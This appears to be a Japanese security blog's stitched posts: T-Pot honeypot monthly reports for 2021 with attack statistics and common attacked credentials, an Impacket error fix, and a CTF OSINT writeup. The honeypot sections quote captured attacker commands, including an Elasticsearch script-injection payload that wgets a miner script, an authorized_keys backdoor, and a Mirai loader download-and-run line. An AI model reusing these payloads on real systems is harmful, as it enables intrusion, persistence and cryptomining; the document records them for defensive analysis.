66 azureuser Nr!_CapiBraksjdlfS@4827fVfg1 San Jose 205[.]185[.]113[.]224 United States
67 web Nr!_CapiBraksjdlfS@4827fVfg1 Las Vegas 209[.]141[.]40[.]193 United States
68 git Nr!_CapiBraksjdlfS@4827fVfg1 Las Vegas 209[.]141[.]40[.]193 United States
69 cisco Nr!_CapiBraksjdlfS@4827fVfg1 Las Vegas 209[.]141[.]40[.]193 United States
70 chia Nr!_CapiBraksjdlfS@4827fVfg1 Las Vegas 209[.]141[.]42[.]170 United States
71 hyjx Nr!_CapiBraksjdlfS@4827fVfg1 Las Vegas 209[.]141[.]42[.]170 United States

⑥今月のマスオさんとZmap
  • massscanの観測結果は以下の通り。 f:id:SYN-ACK:20211114215056j:plain

  • Zmapの観測結果は以下の通り。 f:id:SYN-ACK:20211114215110j:plain

  • Result

    • 特記事項は無し。

最後に

  • 10月はセキュリティイベントが目白押しで楽しみな反面、通常業務以外の作業が多いので乗り切れて安堵している。
  • CodeBlue のセッション動画は再度1日かけて全て見直したいと思う。
  • 個人的にはAVTokyoに(オンラインだけど)初参加できて良かった。AVTOKYO バッジキット購入のため、山手線の移動ルートを考えながら追いついたのが一番の思い出。来年は自宅でOpen xINT CTFにも参加してみたい。

  • 今月のアクセス。
     bashの内容を文字コードに置き換えたアクセス。ASCIIコード変換すると特定サイトから。

IPアドレス:120[.]79[.]156[.]2

Payload  :

{"query":{"filtered":{"query":{"match_all":{}}}},"script_fields":{"exp":{"script":"import java.util.*;\nimport java.io.*;\nString str = \"\";BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(new String[] {\"/bin/bash\",\"-c\",((char)119+(char)103+(char)101+(char)116+(char)32+(char)104+(char)116+(char)116+(char)112+(char)58+(char)47+(char)47+(char)49+(char)56+(char)53+(char)46+(char)49+(char)56+(char)49+(char)46+(char)49+(char)48+(char)46+(char)50+(char)51+(char)52+(char)47+(char)69+(char)53+(char)68+(char)66+(char)48+(char)69+(char)48+(char)55+(char)67+(char)51+(char)68+(char)55+(char)66+(char)69+(char)56+(char)48+(char)86+(char)53+(char)50+(char)48+(char)47+(char)105+(char)110+(char)105+(char)116+(char)46+(char)115+(char)104+(char)32+(char)45+(char)80+(char)32+(char)47+(char)116+(char)109+(char)112+(char)47+(char)115+(char)115+(char)115+(char)111+(char)111+(char)111).toString() }).getInputStream()));StringBuilder sb = new StringBuilder();while((str=br.readLine())!=null){sb.append(str+\"|\");}sb.toString();"}},"size":1}

 ↓
文字コード部分をPrintable形式にすると以下になる。
 ↓

wget http://185[.]181[.]10[.]234/E5DB0E07C3D7BE80V520/init.sh -P /tmp/sssooo

仮想通貨Moneroのminerをインストールさせるmalwareのようだ。

Impacketモジュールの実行に失敗したとき

概要

ImpacketモジュールのGetNPUSers.pypsexec.pyを実行した際にエラーがでることがある。

┌──(root💀kali)-[~]
└─# ./GetUserSPNs.py <ドメイン名>/<ユーザ名>:<パスワード> -dc-ip <DCのIPアドレス> -request
Traceback (most recent call last):
  File "./GetUserSPNs.py", line 42, in <module>
    from pyasn1.codec.der import decoder
ImportError: No module named pyasn1.codec.der

┌──(root💀kali)-[~]
└─# python psexec.py <ドメイン名>/<ユーザ名>:<パスワード>@<ドメイン名>
Traceback (most recent call last):
  File "psexec.py", line 33, in <module>
    from impacket import version, smb
  File "/usr/local/lib/python2.7/dist-packages/impacket/smb.py", line 55, in <module>
    from pyasn1.type.univ import noValue
ImportError: No module named pyasn1.type.univ

原因と対策

python3-pyasn1 で動作するため、python2系で実行するとエラーになる。python3系で実行する。

pyasn1のインストール
┌──(root💀kali)-[~]
└─# sudo apt-get install python3-pyasn1 python3-pyasn1-modules
Impacketモジュールの実行
┌──(root💀kali)-[~]
└─# python3 GetUserSPNs.py <ドメイン名>/<ユーザ名>:<パスワード> -dc-ip <DCのIPアドレス> -request
Impacket v0.9.24.dev1+20210706.140217.6da655ca - Copyright 2021 SecureAuth Corporation

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------


┌──(root💀kali)-[/home/kali/Desktop/impacket/examples]
└─# python3 psexec.py active.htb/Administrator:Ticketmaster1968@active.htb 
Impacket v0.9.24.dev1+20210706.140217.6da655ca - Copyright 2021 SecureAuth Corporation

[*] Requesting shares on <ドメイン名>.....
[*] Found writable share <共有名>

参考URL

github.com gitlab.com

ハニーポット運用(月次報告:2021年9月)

2021年9月2日に、AWSの東京リージョンで大規模な障害が発生した。 2021年9月2日(JST)にAWS Direct Connect サービスの中断により東京リージョン(AP-NORTHEAST-1)で大規模な障害が発生した。

aws.amazon.com

www.publickey1.jp

原因はDirect Connect ロケーションと東京リージョンのデータセンターネットワーク間のネットワーク機器の一部で障害が発生したため。午前7時半から障害が発生し、午後1時42分に障害復旧した。(停止時間はおよそ6時間12分)

スマートフォンで住所変更などを行う三菱UFJ銀行のアプリ
みずほ銀行のネットバンキングのアプリ
SBI証券など、ネット証券各社のサイトの一部でアクセスレスポンス低下
▽携帯電話会社のKDDIでも、スマホ決済の「au PAY」にて入金しにくいなどの影響
全日空では羽田空港などでチェックインを行うシステムに障害が発生
日本航空では貨物の情報に関わる一部のシステムに影響

パブリッククラウドが社会基盤として広く浸透していると共に、基幹システムにおけるパブリッククラウド利用の難しさを改めて考える障害だった。
基幹システムをリリースする上でパブリッククラウドを利用する場合は、大規模障害のリスク費用を見込む必要があるだろう。

T-Potにて1か月運用した結果を記載する。

今月のChangelog

 更新無し。

前提条件

運用日時:2021年9月4日-2021年9月30日
運用期間:26日

結果

①各ハニーポットで検知したAttack件数
  • T-Potを構成する各ハニーポットへの攻撃件数の一覧を以下に記載する。
No ハニーポット 件数 先月比
1 Cowrie 2,728,448 852,542
2 Honeytrap 1,273,466 695,801
3 Dionaea 781,324 326,267
4 Heralding 625,857 120,349
5 Rdpy 158,641 64,556
6 Ciscoasa 34,911 1,083
7 Adbhoney 30,935 15,477
8 Mailoney 14,339 ▲2,016
9 ElasticPot 8,351 801
10 ConPot 3,204 1,708
11 CitrixHoneypot 3,058 1,539
12 Tanner 3,049 ▲1,885
13 Medpot 832 690
  • Result
    • 先月から各ハニーポットへのアクセス推移は変化なし。
    • 先月より観測期間が短いにもかかわらず全体アクセス量が多いことから、9月はアクセス量が多かったと判断される。

②攻撃元の国名と件数(Top 20)
No 攻撃元の国名 件数 先月順位
1 China 1,182,505 1(→)
2 Russia 1,092,591 4(↑)
3 Netherlands 696,241 2(↓)
4 United States 625,600 3(↓)
5 India 188,088 5(→)
6 Vietnam 139,583 11(↑)
7 Brazil 120,196 8(↑)
8 South Korea 93,259 14(↑)
9 Singapore 84,560 7(↓)
10 Indonesia 80,611 9(↓)
11 Germany 72,968 12(↑)
12 France 61,991 6(↓)
13 Japan 60,869 10(↓)
14 Taiwan 57,376 17(↑)
15 Sweden 49,960 圏外(↑)
16 Latvia 49,828 18(↑)
17 Hong Kong 44,732 15(↓)
18 Mexico 42,134 16(↓)
19 United Kingdom 41,848 13(↓)
20 Thailand 39,474 19(↓)
  • Result +中国が1位を維持しており、ロシアが2位に上昇。ニュージーランドからのアクセスは減少気味。
    +唯一スウェーデンからのアクセスが増えているが、全体的な傾向としては大きな変化なし。

③検知したCVEの脆弱性と件数
  • Suricata(オープンIPS)にて検知した各攻撃の脆弱性の内容を以下に記載する。
No CVE ID Count
1 CVE-2020-11899 2,873,189
2 CVE-2019-12263 CVE-2019-12261 CVE-2019-12260 CVE-2019-12255 1,333
3 CVE-2020-11910 47
4 CVE-2019-0708 CVE-2019-0708 CVE-2019-0708 45
5 CVE-2014-2321 CVE-2014-2321 3
  • Result
    • 先月から変更なし

④よく攻撃されるユーザ名
  • ユーザ名でよく攻撃されるキーワード(Top 50)で記載する。
No ユーザ名 件数
1 root 173,845
2 admin 12,600
3 knockknockwhosthere 11,924
4 user 5,966
5 sa 5,852
6 hadoop 5,356
7 sh 3,668
8 postgres 2,890
9 22 2,719
10 oracle 2,466
11 test 2,377
12 git 2,287
13 mysql 2,141
14 (empty) 1,846
15 nproc 1,604
16 huawei 1,539
17 !root 1,366
18 2Wire 1,340
19 guest 1,242
20 ubuntu 1,238
21 support 1,114
22 ftpuser 777
23 ftp 706
24 0 696
25 adm 688
26 debug 687
27 pi 687
28 666666 686
29 blank 686
30 unknown 662
31 www 614
32 administrator 590
33 web 571
34 default 517
35 nagios 394
36 www-data 377
37 anonymous 335
38 testuser 332
39 deploy 308
40 minecraft 293
41 server 290
42 teamspeak 283
43 data 282
44 tomcat 281
45 user1 277
46 Admin 255
47 test1 254
48 jenkins 249
49 demo 248
50 ts3 245
  • Result
    • 先月から確認され始めたknockknockwhosthere(3位)のアクセスが継続して多い。SSH Scanning Activityが継続中のようだ。

⑤よく攻撃されるパスワード
  • パスワードでよく攻撃されるキーワード(Top 50)を以下に記載する。
No パスワード 件数
1 admin 34,796
2 knockknockwhosthere 11,924
3 123456 9,806
4 (empty) 6,768
5 root 5,124
6 password 3,926
7 123 3,600
8 1 3,042
9 12345 2,599
10 1234 2,215
11 blank 2,030
12 nproc 1,604
13 1q2w3e4r 1,293
14 12345678 1,274
15 test 1,125
16 Password 1,066
17 user 986
18 0 917
19 1qaz2wsx 908
20 666666 864
21 0 813
22 support 808
23 ubnt 784
24 master 772
25 alpine 748
26 qwerty 743
27 backup 710
28 hi3518 693
29 !ishtar 688
30 unknown 682
31 synnet 675
32 123456789 663
33 test123 652
34 123123 602
35 abc123 584
36 111111 575
37 pass 487
38 Passw0rd 482
39 1234567 465
40 vizxv 464
41 x 434
42 123qwe 411
43 admin123 410
44 p@ssw0rd 342
45 password123 332
46 changeme 324
47 123321 314
48 P@ssw0rd 311
49 1234567890 301
50 passw0rd 292
  • Result
    • miraiなどのIoT系マルウェアにハードコードされたパスワード、簡易なパスワードが今月も大部分を占めていた。

⑥今月のマスオさんとZmap
  • massscanの観測結果は以下の通り。 f:id:SYN-ACK:20211103105750j:plain

  • Zmapの観測結果は以下の通り。 f:id:SYN-ACK:20211103105815j:plain

  • Result

    • 特記事項は無し。

最後に

  • 10月はセキュリティ系のイベントが多くて楽しみである。
    AVTokyoは是非とも参加したいね。(下戸ですけども... )

  • senpai.loader関連のアクセスは無し。(ただサイト自体はまだ生きている模様だ。)

  • 今月のアクセス。
    9/5に1件だけ観測したbase64エンコードされたアクセス。Shellshcockの脆弱性をついてmalwareをダウンロードさせる動作のようだ。

f:id:SYN-ACK:20211103120539j:plain

ハニーポット運用(月次報告:2021年8月)

情報セキュリティ10大脅威 2021 が公開された。 www.ipa.go.jp

スマホ決済の不正利用」(個人編1位)

個人編の「第1位 スマホ決済の不正利用」は周辺諸国と比較してIT化が遅れてきた日本がキャッシュレス決済の推進により注力すべきセクターになる。まだまだ普及しないマイナンバーカードと連携したITサービスの普及に向けて新規に発足したデジタル庁の積極的な活動が高齢化率が世界1位となった日本の巻き返しの起爆剤となってほしい。

「テレワーク等のニューノーマルな働き方を狙った攻撃」(組織編3位)

組織編では「【3位】テレワーク等のニューノーマルな働き方を狙った攻撃」が新規にランクインしている。2020年から始まったリモートワークも体制が整いつつあり、今後はVPNより効率的なサービスのリリースが見込まれると期待したい。

T-Potにて1か月運用した結果を記載する。

今月のChangelog

 更新無し。

前提条件

運用日時:2021年8月1日-2021年8月31日
運用期間:31日

結果

①各ハニーポットで検知したAttack件数
  • T-Potを構成する各ハニーポットへの攻撃件数の一覧を以下に記載する。
No ハニーポット 件数 先月比
1 Cowrie 1875906 159,463
2 Honeytrap 577665 ▲248,060
3 Heralding 505508 ▲682,837
4 Dionaea 455057 101,030
5 Rdpy 94085 ▲12,205
6 Ciscoasa 33828 ▲68
7 Mailoney 16355 1,831
8 Adbhoney 15458 6,191
9 ElasticPot 7550 6,329
10 Tanner 4934 ▲341
11 CitrixHoneypot 1519 ▲110
12 ConPot 1496 ▲86
13 Medpot 142 ▲6
  • Result
    • 他のハニーポットの調査件数が減る中でCowrieへのアクセスが継続して多かった。

②攻撃元の国名と件数(Top 20)
No 攻撃元の国名 件数 先月順位
1 China 730,648 3(↑)
2 Netherlands 567,144 1(↓)
3 United States 492,469 4(↑)
4 Russia 373,435 2(↓)
5 India 99,081 9(↑)
6 France 93,956 6(→)
7 Singapore 85,728 8(↑)
8 Brazil 78,177 13(↑)
9 Indonesia 65,453 17(↑)
10 Japan 61,394 10(→)
11 Vietnam 60,102 11(→)
12 Germany 56,065 15(↑)
13 United Kingdom 55,834 20(↑)
14 South Korea 54,772 14(→)
15 Hong Kong 44,797 圏外(↑)
16 Mexico 35,419 圏外(↑)
17 Taiwan 29,191 圏外(↑)
18 Latvia 26,666 16(↓)
19 Thailand 26,552 圏外(↑)
20 Albania 25,589 圏外(↑)
  • Result
    • 中国が久しぶりに1位に返り咲いた。
    • ロシアが久しぶりに4位へ後退。変わってアメリカが3位に上がった。まるでメダル争いのようだ。

③検知したCVEの脆弱性と件数
  • Suricata(オープンIPS)にて検知した各攻撃の脆弱性の内容を以下に記載する。
No CVE ID Count
1 CVE-2020-11899 1,261,316
2 CVE-2019-12263 CVE-2019-12261 CVE-2019-12260 CVE-2019-12255 419
3 CVE-2019-0708 CVE-2019-0708 CVE-2019-0708 26
4 CVE-2020-11910 1
5 CVE-2021-27561 CVE-2021-27561 CVE-2021-27562 CVE-2021-27561 1

④よく攻撃されるユーザ名
  • ユーザ名でよく攻撃されるキーワード(Top 50)で記載する。
No ユーザ名 件数
1 root 85,576
2 admin 43,240
3 knockknockwhosthere 16,731
4 sh 5,713
5 test 4,854
6 user 4,761
7 sa 4,166
8 nproc 3,685
9 ubuntu 3,673
10 postgres 3,163
11 oracle 2,433
12 git 2,142
13 ftpuser 1,960
14 deploy 1,444
15 hadoop 1,435
16 22 1,386
17 guest 1,337
18 default 1,291
19 minecraft 1,270
20 mysql 1,182
21 support 1,164
22 www 1,124
23 testuser 1,108
24 teamspeak 1,086
25 nagios 957
26 server 942
27 user1 907
28 web 906
29 administrator 884
30 ftp 882
31 (empty) 866
32 www-data 855
33 tomcat 836
34 ts3 812
35 jenkins 744
36 student 715
37 teamspeak3 704
38 test1 695
39 tester 693
40 2Wire 685
41 !root 681
42 dev 674
43 webmaster 667
44 alex 663
45 vbox 647
46 demo 643
47 steam 629
48 ts 605
49 sysadmin 586
50 testftp 577
  • Result
    • knockknockwhosthere(3位)を新規に確認した。

⑤よく攻撃されるパスワード
  • パスワードでよく攻撃されるキーワード(Top 50)を以下に記載する。
No パスワード 件数
1 knockknockwhosthere 16,731
2 admin 14,759
3 123456 11,421
4 123 5,127
5 password 4,426
6 (empty) 4,027
7 nproc 3,681
8 1 3,327
9 1234 3,299
10 12345 3,109
11 root 2,138
12 test 1,851
13 123123 1,442
14 12345678 1,413
15 1qaz2wsx 1,248
16 1q2w3e4r 1,226
17 vizxv 1,218
18 blank 1,052
19 pass 1,009
20 qwerty 983
21 test123 958
22 123456789 952
23 123321 929
24 a 891
25 P@ssw0rd 794
26 123qwe 790
27 111111 751
28 abc123 733
29 p@ssw0rd 725
30 user 714
31 passw0rd 697
32 admin123 633
33 password123 630
34 1234567 629
35 12 535
36 1qaz@WSX 520
37 qwe123 508
38 support 471
39 666666 451
40 pass123 423
41 ubnt 414
42 1q2w3e 412
43 changeme 396
44 qwer1234 393
45 backup 376
46 master 371
47 0 368
48 q1w2e3 366
49 qwerty123 351
50 1q2w3e4r5t6y 332
  • Result
    • ユーザ名と同じknockknockwhosthereというパスワードのアクセスが急激に増加していた。
        SANSのCowrieでも同様のSSH Scanning Activityを観測しているようだ

isc.sans.edu


⑥今月のマスオさんとZmap
  • massscanの観測結果は以下の通り。 f:id:SYN-ACK:20210927174001j:plain

  • Zmapの観測結果は以下の通り。 f:id:SYN-ACK:20210927174021j:plain

  • Result

    • massscanが0件だった。こんな日がくるとは...
    • Zmapは相変わらず多い。

最後に

  • 東京オリンピック開催期間直後の8月9日からuser : knockknockwhosthere/pass : knockknockwhosthereのSSH Scanning Activityが急激に増加していた。何らかの製品に起因するアカウントでもなく、特定の国ではなく各国よりアクセスがみられるためオリンピックに起因したものと推測している。

  • 今月多かったアクセス。

コマンド  :"cd ~ && rm -rf .ssh && mkdir .ssh && echo ""ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr"">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
IPアドレス:136.144.41.41    
コマンド  :cd /var/tmp ; curl -s -L -O 31.210.20.142/.billgates/.senpai.loader || wget --no-check-certificate 31.210.20.142/.billgates/.senpai.loader ; chmod 777 .senpai.loader ; ./.senpai.loader ; rm -rf .senpai.loader ; history -c ; rm -rf ~/.bash_history   
接続元   :United States   

このURL配下の.senpai.loaderへアクセスしてみると難読化されていないシェルスクリプトが表示される。
現役のMiraiのBotnetとのこと。

f:id:SYN-ACK:20211007230032j:plain

31.210.20.142がDropperサイトになる。.senpai.loaderは264行からなるシェルスクリプトで構成されており、環境に合わせて対応するmalwareがダウンロードされるようだ。

f:id:SYN-ACK:20211007231828j:plain

こんな感じのスクリプトが延々と...
危険なので、「でりとっ!」 (ばんばん)

setodaNoteCTF - Writeup (OSINT : secret_operation)

8/21(土) 21:00 JST~9/4(土) 21:00 JSTに開催されたsetodaNoteCTF に会社のチームで参加した。 他のチームメンバーの陰で解けた問題のWriteupを記載する。

OSINT

secret_operation

あなたと同僚は敵対組織が秘密裏に進めているオペレーションの調査を命じられました。

「どうやら事を起こそうとしているようだ。」

調査開始からしばらく経った頃、同僚からある画像が届きました。それはかなり不鮮明だったものの、どこかの Web ページを写したと思われる画像データでした。詳細を確認しようと同僚と連絡をとろうとしましたが返信はなく、同僚からの連絡はそれを最後に途絶えてしまいました。画像の Web ページを調査し敵対組織が秘密裏に進めているオペレーションを明らかにしなければ。

添付されたファイルを解析し、フラグを得てください。

添付ファイルの画像に記載された以下のURLへアクセスすると接続元の情報が表示される。

f:id:SYN-ACK:20210904225202j:plain

まずは添付ファイルの接続元が表示されるように偽装する必要があるようだ。
X-Forwarded-Forの指定によるアクセスではうまく偽装されないため、VPNかプロキシ経由であれば接続元が変更されることを確認した。今回は一時的にプロキシ経由でロシアのサンクト・ペテルブルグからつなげた。(OSのプロキシ設定と独立しているFirefoxのブラウザ設定のプロキシ設定を変更して確認すると便利かな~と思います。)

添付ファイルの画像と同じアクセス元でアクセスすることで得られた情報は3つになる。

Twitterのアカウント
 @aarron142857
②サイトのURL(basic認証が必要)
 https://billowing-poetry-3254.setodanote.net
③ロシア語?のことわざ
 Молодец против овец, а против молодца и сам овца.

②のbasic認証が必要なURLについてヒントになりそうなものがなく、ここで詰まった。(セキュリティツールのhydra?現実的ではなさそうだ...)

色々調べていくと問題のTwitterアカウントがいいねしている内容で以下のものがあった。画像ファイルにzipを組み込む記事。

投稿している画像を確認すると1番最初の画像だけpngで後はjpeg形式。

f:id:SYN-ACK:20210904225153p:plain

対象のpng画像を確認するとUserとパスワードが記載された画像が末尾に付与されていた。

f:id:SYN-ACK:20210904224952p:plain

画像の情報は②サイトのURLに入力するアカウント/パスワードになる。
CHECK MY BIOTwitterJ.Sの記載が該当する。

②のサイトに得られたアカウントでログインすると以下の画面が表示される。
ユーザ名:J.S
パスワード:right_next_to_you 

f:id:SYN-ACK:20210904225431j:plain

再度一時的にプロキシの設定を変更してロシアからのアクセスに偽装すると修正された部分のflagが見えた。

f:id:SYN-ACK:20210904225442j:plain

flag{=we_can_change_tomorrow=}

感想

・主催者様へ、素晴らしい大会を開催頂き有難うございました。
 取り組みやすい問題が多く 非常に楽しかったです。